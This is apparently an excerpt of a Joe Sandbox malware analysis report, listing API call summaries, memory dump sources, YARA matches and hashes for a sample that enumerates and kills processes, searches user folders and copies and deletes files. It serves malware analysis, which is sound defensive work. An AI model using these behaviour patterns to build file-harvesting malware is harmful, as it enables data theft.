                        • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                      • CloseHandle.KERNEL32(00000000), ref: 004195D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                      • String ID:
                      • API String ID: 396451647-0
                      • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                      • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                      • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                      • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                      APIs
                      • memset.MSVCRT ref: 04119752
                        • Part of subcall function 04118FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,04119785,00000000), ref: 04118FC2
                        • Part of subcall function 04118FB7: RtlAllocateHeap.NTDLL(00000000), ref: 04118FC9
                        • Part of subcall function 04118FB7: wsprintfW.USER32 ref: 04118FDF
                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 04119812
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 04119830
                      • CloseHandle.KERNEL32(00000000), ref: 0411983D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                      • String ID:
                      • API String ID: 3729781310-0
                      • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                      • Instruction ID: 03b69abfbc97f946fa6d49e532ea970937acf7c3128f253b843bd554a049776d
                      • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                      • Instruction Fuzzy Hash: 3D3117B5A51248AFEB14DFE0CC98BEDB779EF44300F104469E506AA194EB74AA84CF51
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                      • Process32First.KERNEL32(?,00000128), ref: 004186DE
                      • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • CloseHandle.KERNEL32(?), ref: 00418761
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: 295465e2c392afe472870706c1eb777868b99a61b0a103c81585df39d90fc3af
                      • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                      • Opcode Fuzzy Hash: 295465e2c392afe472870706c1eb777868b99a61b0a103c81585df39d90fc3af
                      • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 04118931
                      • Process32First.KERNEL32(?,00000128), ref: 04118945
                      • Process32Next.KERNEL32(?,00000128), ref: 0411895A
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                      • CloseHandle.KERNEL32(?), ref: 041189C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                      • Instruction ID: f44fecbfb5de46588b99d65b860daef5386178c84ec0171446c938d81a8d294f
                      • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                      • Instruction Fuzzy Hash: C2314171941258ABDB24EF94DD84FEEBB78EF45744F1041A9E10DA21A0EB347E44CF91
                      APIs
                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                      • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                      • lstrcatA.KERNEL32(?,0251CE80), ref: 00414FAB
                      • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                      • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                      • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                      • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                      • wsprintfA.USER32 ref: 00418850
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocProcesslstrcpywsprintf
                      • String ID: %dx%d
                      • API String ID: 2716131235-2206825331
                      • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                      • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                      • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                      • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcessstrtok_s
                      • String ID:
                      • API String ID: 3407564107-0
                      • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                      • Instruction ID: 424a64ff0e2d01b73999142d3aa5e431ba1d68b6ec15cc7f6a7c0662463cbe2c
                      • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                      • Instruction Fuzzy Hash: 5F1128B4911209EFCB04DFE4D988AEDBBB9FF04345F10846AE90A67260E7706B44CF55
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                      • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                      • wsprintfA.USER32 ref: 004179F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 1243822799-0
                      • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                      • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                      • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                      • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 04117C17
                      • RtlAllocateHeap.NTDLL(00000000), ref: 04117C1E
                      • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 04117C2B
                      • wsprintfA.USER32 ref: 04117C5A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 377395780-0
                      • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                      • Instruction ID: 2eab7948343bd40d05e9b74c120a7987eae3a44139f4d52cd18e5478dd3e43a2
                      • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                      • Instruction Fuzzy Hash: 941139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB1
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 04117CCA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 04117CD1
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 04117CE4
                      • wsprintfA.USER32 ref: 04117D1E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 3317088062-0
                      • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                      • Instruction ID: c34dc9d40366b8156eda976a25e78045c7608e1b05c5bbdc058fb94183e4fd93
                      • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                      • Instruction Fuzzy Hash: D6115EB1A45218EFEB248F54DC49FA9B7B8FB05721F1043AAE51AA32D0D7746940CF51
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: strtok_s
                      • String ID:
                      • API String ID: 3330995566-0
                      • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                      • Instruction ID: 088e3591210de1a6a657e912e5863f47e31c10afbab2a68356e86bc88e5e4d17
                      • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                      • Instruction Fuzzy Hash: CE1106B4E40209EFEB18CFE6D988BEEB7B5FB04705F10C129E425A6264D774A501CF55
                      APIs
                      • CreateFileA.KERNEL32(04113D55,80000000,00000003,00000000,00000003,00000080,00000000,?,04113D55,?), ref: 04119563
                      • GetFileSizeEx.KERNEL32(000000FF,04113D55), ref: 04119580
                      • CloseHandle.KERNEL32(000000FF), ref: 0411958E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID:
                      • API String ID: 1378416451-0
                      • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                      • Instruction ID: c8205a7044619a599847283430ae35350f48daff8621da4e35fa5d8342a19f91
                      • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                      • Instruction Fuzzy Hash: DBF03179E50204BBDB14DFF0DC59B9E7BBAEB49710F10C554FA22A7190E635A601CB41
                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 04116D31
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04116D4F
                      • CloseHandle.KERNEL32(00000000), ref: 04116D60
                      • Sleep.KERNEL32(00001770), ref: 04116D6B
                      • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 04116D81
                      • ExitProcess.KERNEL32 ref: 04116D89
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:
                      • API String ID: 941982115-0
                      • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                      • Instruction ID: 1a6577592af56160fb1bd59b5006f998cf6a0d9b9d06eb27533361ea7d8405dd
                      • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                      • Instruction Fuzzy Hash: 6DF0BE78A44A05BFFF00ABE0CC89BBD3635EF04349F010638F102A11B0DBB16100CA56
                      APIs
                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                      • lstrcatA.KERNEL32(?,0254D530), ref: 00414C08
                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                        • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0251D020,?,000003E8), ref: 00414A4A
                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                        • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                        • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: UaA
                      • API String ID: 2104210347-3893042857
                      • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                      • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                      • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                      • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • GetSystemTime.KERNEL32(?,02519360,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: SystemTimelstrcpy
                      • String ID: cI@$cI@
                      • API String ID: 62757014-1697673767
                      • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                      • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                      • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                      • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                      APIs
                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                      • lstrcatA.KERNEL32(?,0254C918), ref: 004150A8
                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                      • String ID: aA
                      • API String ID: 2699682494-2567749500
                      • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                      • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                      • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                      • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                        • Part of subcall function 0411AA07: lstrcpy.KERNEL32(?,00000000), ref: 0411AA4D
                        • Part of subcall function 0410A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0410A094
                      • lstrlen.KERNEL32(00000000), ref: 0410BF06
                        • Part of subcall function 04119097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 041190B9
                      • StrStrA.SHLWAPI(00000000,004213E0), ref: 0410BF34
                      • lstrlen.KERNEL32(00000000), ref: 0410C00C
                      • lstrlen.KERNEL32(00000000), ref: 0410C020
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                      • String ID:
                      • API String ID: 1440504306-0
                      • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                      • Instruction ID: 6d1ae9584b8e53480fd37e949254321e32efbd4f3a67baf9f43a6c54f8910d14
                      • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                      • Instruction Fuzzy Hash: 3AB13171911208ABEF18FBA0DDD5EEE7B39AF54248F40416DE50A620A0EF747B48CF61
                      APIs
                      • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                      • FindClose.KERNEL32(000000FF), ref: 00413C7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$CloseFileNextlstrcat
                      • String ID: !=A
                      • API String ID: 3840410801-2919091325
                      • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
